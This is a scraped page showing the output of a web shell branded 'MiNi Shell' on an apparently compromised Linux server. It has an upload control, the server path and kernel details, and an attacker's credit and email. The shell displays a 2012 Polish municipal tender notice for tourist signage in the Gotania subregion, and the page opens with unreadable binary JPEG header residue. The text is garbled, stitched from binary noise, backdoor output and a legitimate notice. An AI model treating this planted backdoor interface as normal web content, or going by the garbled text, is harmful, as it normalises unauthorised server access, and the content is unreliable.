JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/74749-N-2012.html

<p class="kh_header"><b>Hrubieszów: WYKONANIE OZNAKOWAŃ TURYSTYCZNYCH (WITACZY) PODREGIONU GOTANIA W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA</b><br>
<b>Numer ogłoszenia: 74749 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE OZNAKOWAŃ TURYSTYCZNYCH (WITACZY) PODREGIONU GOTANIA W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wykonania oraz montażu oznakowań turystycznych (25 sztuk witaczy) wg koncepcji przygotowanej wzorcowo, zamieszczonej w załączniku nr 7 do SIWZ.
Szczegółowy opis przedmiotu zamówienia:
1) Wykonanie i montaż 10 szt. dwustronnych witaczy (załącznik nr 7 - rys. b), które zostaną ustawione w miejscowościach będących siedzibami gmin  uczestniczących w projekcie:
Miasto Hrubieszów
Gmina Hrubieszów
Gmina Werbkowice
Gmina Trzeszczany
Gmina Tomaszów Lubelski
Gmina Uchanie
Gmina Mircze
Gmina Dołhobyczów
Gmina Tyszowce
Gmina Komarów-Osada
Jedna strona witacza - z podświetloną wewnątrz gablotą informacyjną o zastosowaniu zewnętrznym, na tle mapy podregionu Gotania, gablota o wymiarach 115cm na 90cm wykonana z aluminium anodowanego, drzwiczki jednostronne, szkło bezpieczne z folią wewnątrz między szybami, podświetlenie wewnętrzne w technologii LED. Doprowadzenie instalacji elektrycznej do witacza leży po stronie gmin uczestniczących w projekcie.
Elementy, które powinny zostać umieszczone na tej stronie każdego z 10  szt. witaczy: logotyp Gotanii, nazwa i herb gminy, dane teleadresowe gminy, oznakowanie zgodnie z Wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy.

Druga strona witacza - ze szczegółową mapą i legendą podregionu Gotania, z wyraźnym zaznaczeniem gminy, której dotyczy witacz. Elementy, które powinny zostać umieszczone na tej stronie każdego z 10 szt. witaczy: logotyp Gotanii, nazwa i herb gminy, adres www.gotania.pl oraz oznakowanie, zgodnie z Wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy.

2) Wykonanie i montaż 15 szt. dwustronnych witaczy (załącznik nr 7 - rys. a), które zostaną ustawione na obszarze Gotanii, na terenach stanowiących własność gmin uczestniczących w projekcie.

Jedna strona witacza - z mapą podregionu Gotania, na tle której powinny zostać umieszczone następujące elementy: logotyp Gotanii, nazwa i herb gminy na obszarze której zostanie ustawiony witacz,  napis WITA, adres www.gotania.pl  oraz oznakowanie zgodnie z Wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy.

Druga strona witacza - z mapą podregionu Gotania, na tle której powinny zostać umieszczone następujące elementy: logotyp Gotanii, nazwa i herb gminy na obszarze której zostanie ustawiony witacz,  napis ZAPRASZA, adres www.gotania.pl  oraz oznakowanie zgodnie z Wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy.

Zamawiający po podpisaniu umowy przekaże wykonawcy wszelkie dane niezbędne do zamieszczenia na witaczach (dane teleadresowe, herby gmin, logotyp Gotanii). Zamawiający zastrzega sobie prawo do wprowadzenia zmian w elementach planowanych do zamieszczenia na witaczach w stosunku do koncepcji przygotowanej wzorcowo                         z zastrzeżeniem, iż zmiany te nie będą miały wpływu na zmianę ceny oferty i terminu realizacji umowy.  Zmiany mogą być wprowadzone na wniosek Zamawiającego lub Wykonawcy i powinny być uzgodnione pomiędzy stronami umowy.

Wymiary i parametry dla wszystkich oznakowań turystycznych (25 szt. witaczy):
Konstrukcja wielkogabarytowa, wykonana na bazie kształtowników stalowych (przekrój prostokątny 100x 50 mm) zespolonych ze sobą (kształtownik 50 x 50mm) zabezpieczona powłoka antykorozyjna - standard C-5-J (Ochrona Bierna Zestawem Powłokowym). Poszycie konstrukcji stanowią profilowane łukowato panele wykonane na bazie blach ocynkowanych o grubości 0,7 lub 1 mm, kolor poszycia nadawany poprzez oklejanie wysokojakościowymi foliami typu VINYL odpornymi na działanie warunków zewnętrznych.
Wykończenie konstrukcji wykonane w sposób odpowiadający przepisom BHP - brak ostrych krawędzi, śrub itp. (krawędzie blach zagięte do środka lub schowane w strukturze konstrukcji, elementy maskujące, zapewniające wysoką estetykę).
Panel górny dwustronny z logotypem Gotania wykonany w formie owala brytów o wymiarach 115 cm na 130cm, wykonane z lica drzewa (dąb lub jesion) lub powłoki imitującej drewno + litery przestrzenne z DIBOND (imitującego stal) bądź stali nierdzewnej - frezowane laserowo bądź CNC. Bryt z napisami WITA i  ZAPRASZA o szerokości 170 cm wykonany z drzewa lub powłoki imitującej drewno + litery przestrzenne metal / dibond frezowany wzmocniony profilem 20 x 20 mm.
Plastyka brytów wykonana metodą obróbki cyfrowej CNC / Laser +wydruk Solvent + laminat chroniący przed warunkami atmosferycznymi. Całość zakotwiona w stopie fundamentowej umożliwiającej zmianę lokalizacji (przeniesienie w inne miejsce).
Grafika na dwie strony witacza, stanowiąca zawartość merytoryczną przedmiotu zamówienia wykonana ma zostać w druku UV w celu uniknięcia blaknięcia wydruku
Rodzaj oraz rozmiar czcionki na dwie strony witacza zostanie ustalona z Zamawiającym 
Kolor witacza ma odpowiadać kolorowi z załącznika nr 7 do SIWZ (ustalony i zatwierdzony ostatecznie przez Zamawiającego).
Przed rozpoczęciem druku na poszczególnych elementach przedmiotu zamówienia Wykonawca zobowiązany jest dostarczyć Zamawiającemu ich ostateczne projekty graficzne do zatwierdzenia.
Minimalna trwałość kolorów i materiału - 5 lat od dnia protokolarnego odbioru.

Oznakowanie powinno być zamontowane na fundamencie z betonu zbrojonego (wykonywanego na mokro) lub fundamentu prefabrykowanego o masie i wymiarach gwarantujących stabilność konstrukcji. Instalując/montując oznakowania turystyczne, Wykonawca zobowiązuje się do realizacji w/w zadania w taki sposób, aby obiekty te nie zagrażały bezpieczeństwu. W przypadku, kiedy pojawią się jakiekolwiek wątpliwości lub przesłanki stanowiące zagrożenie, Wykonawca na własny koszt będzie zobligowany do niezwłocznego dokonania stosownych działań związanych z naprawą.

Dokładne miejsca ustawienia witaczy zostaną uzgodnione z Wykonawcą w trakcie realizacji umowy. Wykonawca odpowiedzialny będzie za wszelkie formalności związane z ustawieniem witaczy wynikające z przepisów prawa. Wykonawca uzyska zgodę na ustawienie witaczy od organu właściwego administracyjnie dla danej gminy. Zamawiający udzieli Wykonawcy pełnomocnictwa do występowania przez organami oraz przekaże wymagane zgody do prawa dysponowania gruntem na cele budowlane.

Wykonawca udzieli 5 letniej gwarancji na materiały i robociznę w dniu bezusterkowego odbioru końcowego przedmiotu zamówienia, co znajdzie  potwierdzenie w końcowym protokole odbioru usługi.
Przy wykonywaniu prac należy stosować materiały i urządzenia dopuszczone do obrotu i stosowania w budownictwie, posiadające stosowne aprobaty, certyfikaty i atesty.
Obowiązkiem Wykonawcy jest utrzymanie porządku i ochrony mienia znajdującego się na terenie montażu witaczy i terenach przyległych.
W zakres zamówienia wchodzą wszystkie prace, usługi i materiały konieczne do wykonania zamówienia zgodnie z wymaganiami SIWZ, jak również pozostałe czynności, opłaty i koszty niezbędne dla prawidłowego wykonania przedmiotu zamówienia                    (np. opłaty, podatki, narzuty, cła itp.) oraz uzgodnienia i pozwolenia administracyjne niezbędne do ustawienia witaczy.
Miejsce składowania elementów (witaczy), powinno być zlokalizowane na terenie miasta Hrubieszowa na koszt i ryzyko Wykonawcy.
Wykonawca wskazuje Zamawiającemu miejsce i sposób składowania przed terminem dostarczenia i wystawienia faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 30.19.21.70-3, 79.82.25.00-7, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zostały wykonane a w przypadku okresowych lub ciągłych są wykonywane należycie co najmniej trzy usługi odpowiadających swoim charakterem przedmiotowi zamówienia o wartości min. 8 000 PLN brutto każda. Zamawiający uzna za odpowiadającą swoim charakterem usługę stanowiącą przedmiot zamówienia polegającą na wykonaniu witaczy, tablic, pylonów lub totemów odpowiadających swoim rodzajem przedmiotowi zamówienia - zgodnie z załącznikiem nr 6 do SIWZ

Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
1. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	W przypadku udziału podwykonawców - załącznik nr 3
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.
2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie wystąpienia zdarzeń określanych jako siła wyższa, których nie można było przewidzieć w chwili podpisania niniejszej umowy i które nie wynikają z winy żadnej ze stron (np. zmiana terminu wykonania II etapu zamówienia z uwagi na przedłużające się procedury administracyjne związane z uzyskaniem pozwoleń na ustawienie oznakowań).
3.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług, 
2)	wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)	przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert, 
4.	Nie stanowi zmiany umowy:
1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miejska Hrubieszów
ul. mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 13:00, miejsce: Gmina Miejska Hrubieszów
ul. mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów 
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Szwajcarię w ramach Szwajcarsko - Polskiego Programu Współpracy z nowymi krajami członkowskimi Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com